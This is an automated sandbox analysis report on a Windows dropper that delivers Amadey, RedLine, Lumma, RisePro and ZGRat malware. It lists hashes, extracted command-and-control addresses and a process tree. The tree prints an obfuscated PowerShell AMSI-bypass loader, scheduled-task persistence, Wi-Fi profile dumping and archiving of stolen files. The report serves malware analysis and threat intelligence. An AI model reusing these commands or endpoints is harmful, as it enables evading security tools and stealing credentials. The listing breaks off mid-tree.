Analysis

  • max time kernel
    143s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-03-2024 18:02

General

  • Target

    f8c54e5d8a702bc46f0d824ee29ca9b45a3b6c9216578b4ece911e8c57f9419d.exe

  • Size

    1.8MB

  • MD5

    bb45d62ca3f0d3a68f82e70eb5b1f90a

  • SHA1

    d078bb4bee3cadc712661d43e56f52bb3fc5a20d

  • SHA256

    f8c54e5d8a702bc46f0d824ee29ca9b45a3b6c9216578b4ece911e8c57f9419d

  • SHA512

    a89258b202396a1e1a3f8241118ee0094ea153fc809fef879db328e43d1a9b31bb183a5b1b881c8648f97d1e2106025ae7076ff1a7a60e99aa7bcbb9e7026e86

  • SSDEEP

    24576:ZpC4D8Yq00vQOd588LYJmP8NVqACWt0XlrvfmZEEhDXrEAx+h5ZfYlAtlCT36Akn:ZpPta0C+R1gNHmNXwAWP3+eBYsYCo

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.137.132:1632

Extracted

Family

lumma

C2

https://enthusiasimtitleow.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 25 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 7 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{5fcce37d-c65c-4af6-aa8b-234b26f3da27}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2080
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:664
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:684
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
            1⤵
              PID:588
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:388
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                  PID:1140
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1152
                    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                      C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                      2⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3748
                    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      2⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Adds Run key to start application
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3184
                      • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        PID:780
                      • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2960
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          4⤵
                            PID:2936
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4816
                            • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                              "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6072
                            • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                              "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                              5⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:452
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                              5⤵
                                PID:4564
                                • C:\Windows\SysWOW64\choice.exe
                                  choice /C Y /N /D Y /T 3
                                  6⤵
                                    PID:5216
                            • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
                              "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
                              3⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3056
                            • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
                              "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1392
                            • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
                              "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:216
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                              3⤵
                              • Loads dropped DLL
                              PID:4472
                              • C:\Windows\system32\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                4⤵
                                • Blocklisted process makes network request
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5404
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show profiles
                                  5⤵
                                    PID:5948
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\757987694264_Desktop.zip' -CompressionLevel Optimal
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5432
                              • C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
                                "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:5820
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  4⤵
                                    PID:2120
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    4⤵
                                      PID:1672
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      4⤵
                                        PID:2680
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        4⤵
                                          PID:3404
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1728
                                      • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
                                        3⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:1068
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:1672
                                      • C:\Users\Admin\AppData\Local\Temp\1001061001\Second2.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1001061001\Second2.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        PID:4256
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          4⤵
                                            PID:5644
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 2020
                                              5⤵
                                              • Program crash
                                              PID:5720
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          PID:4400
                                        • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3004
                                          • C:\Users\Admin\AppData\Local\Temp\$77605faf
                                            "C:\Users\Admin\AppData\Local\Temp\$77605faf"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5976
                                          • C:\Users\Admin\AppData\Local\Temp\$774ec81f
                                            "C:\Users\Admin\AppData\Local\Temp\$774ec81f"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5276
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 328
                                              5⤵
                                              • Program crash
                                              PID:1488
                                        • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5988
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            4⤵
                                              PID:1352
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 876
                                              4⤵
                                              • Program crash
                                              PID:5184
                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          2⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4368
                                        • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                          C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1232
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TRlQaahkpOZQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MlspHkumDPTRjP,[Parameter(Position=1)][Type]$STcPpKwsTS)$nTZqGLtlLLQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+''+'S'+''+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+'n'+'s'+''+'i'+''+'C'+'l'+[Char](97)+'s'+[Char](115)+''+','+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$nTZqGLtlLLQ.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MlspHkumDPTRjP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');$nTZqGLtlLLQ.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+','+''+'H'+''+'i'+'de'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+'o'+[Char](116)+','+[Char](86)+'i'+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+'',$STcPpKwsTS,$MlspHkumDPTRjP).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $nTZqGLtlLLQ.CreateType();}$ZoFejKpwzhDZt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n3'+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+'e'+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$wQftJZkwEHfnaw=$ZoFejKpwzhDZt.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'c'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vxGiOfhgJPNyQaNisRR=TRlQaahkpOZQ @([String])([IntPtr]);$VtKKaGoVCpnJpwCXFFlveb=TRlQaahkpOZQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PeyBKOWtIaC=$ZoFejKpwzhDZt.GetMethod('Ge'+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+'d'+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'l'+'l'+'')));$xZknsLSHAToCVk=$wQftJZkwEHfnaw.Invoke($Null,@([Object]$PeyBKOWtIaC,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$ZaGmqxZTLJfLLRsiw=$wQftJZkwEHfnaw.Invoke($Null,@([Object]$PeyBKOWtIaC,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+''+'P'+'ro'+'t'+''+'e'+''+'c'+'t')));$haPvZHh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xZknsLSHAToCVk,$vxGiOfhgJPNyQaNisRR).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$kaARwIYuwEinPelbj=$wQftJZkwEHfnaw.Invoke($Null,@([Object]$haPvZHh,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+'n'+'B'+''+'u'+''+'f'+'fe'+'r'+'')));$BBXgpOBbqL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZaGmqxZTLJfLLRsiw,$VtKKaGoVCpnJpwCXFFlveb).Invoke($kaARwIYuwEinPelbj,[uint32]8,4,[ref]$BBXgpOBbqL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kaARwIYuwEinPelbj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZaGmqxZTLJfLLRsiw,$VtKKaGoVCpnJpwCXFFlveb).Invoke($kaARwIYuwEinPelbj,[uint32]8,0x20,[ref]$BBXgpOBbqL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                          2⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Drops file in System32 directory
                                          • Suspicious use of SetThreadContext
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5752
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                        1⤵
                                          PID:1164
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          1⤵
                                            PID:1196
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                            1⤵
                                              PID:1244
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                              1⤵
                                                PID:1304
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                1⤵
                                                  PID:1316
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                  1⤵
                                                    PID:1424
                                                    • C:\Windows\system32\sihost.exe
                                                      sihost.exe
                                                      2⤵
                                                        PID:5988
                                                      • C:\Windows\system32\sihost.exe
                                                        sihost.exe
                                                        2⤵
                                                          PID:2572
                                                        • C:\Windows\system32\sihost.exe
                                                          sihost.exe
                                                          2⤵
                                                            PID:1036
                                                          • C:\Windows\system32\sihost.exe
                                                            sihost.exe
                                                            2⤵
                                                              PID:5076
                                                            • C:\Windows\system32\sihost.exe
                                                              sihost.exe
                                                              2⤵
                                                                PID:5712
                                                              • C:\Windows\system32\sihost.exe
                                                                sihost.exe
                                                                2⤵
                                                                  PID:4920
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                1⤵
                                                                  PID:1440
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                  1⤵
                                                                    PID:1576
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                    1⤵
                                                                      PID:1592
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                      1⤵
                                                                        PID:1680
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                        1⤵
                                                                          PID:1708
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                          1⤵
                                                                            PID:1736
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                            1⤵
                                                                              PID:1808
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                              1⤵
                                                                                PID:1816
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                1⤵
                                                                                  PID:1900
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                  1⤵
                                                                                    PID:1908
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                    1⤵
                                                                                      PID:1976
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                      1⤵
                                                                                        PID:1984
                                                                                      • C:\Windows\System32\spoolsv.exe
                                                                                        C:\Windows\System32\spoolsv.exe
                                                                                        1⤵
                                                                                          PID:1484
                                                                                        • C:\Windows\sysmon.exe
                                                                                          C:\Windows\sysmon.exe
                                                                                          1⤵
                                                                                            PID:2504
                                                                                          • C:\Users\Admin\AppData\Local\Temp\f8c54e5d8a702bc46f0d824ee29ca9b45a3b6c9216578b4ece911e8c57f9419d.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\f8c54e5d8a702bc46f0d824ee29ca9b45a3b6c9216578b4ece911e8c57f9419d.exe"
                                                                                            1⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks computer location settings
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Drops file in Windows directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4072
                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                              2⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2732
                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000042001\20071be6d2.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000042001\20071be6d2.exe"
                                                                                                3⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                PID:3548
                                                                                              • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                3⤵
                                                                                                  PID:5092
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3752
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                    4⤵
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4080
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
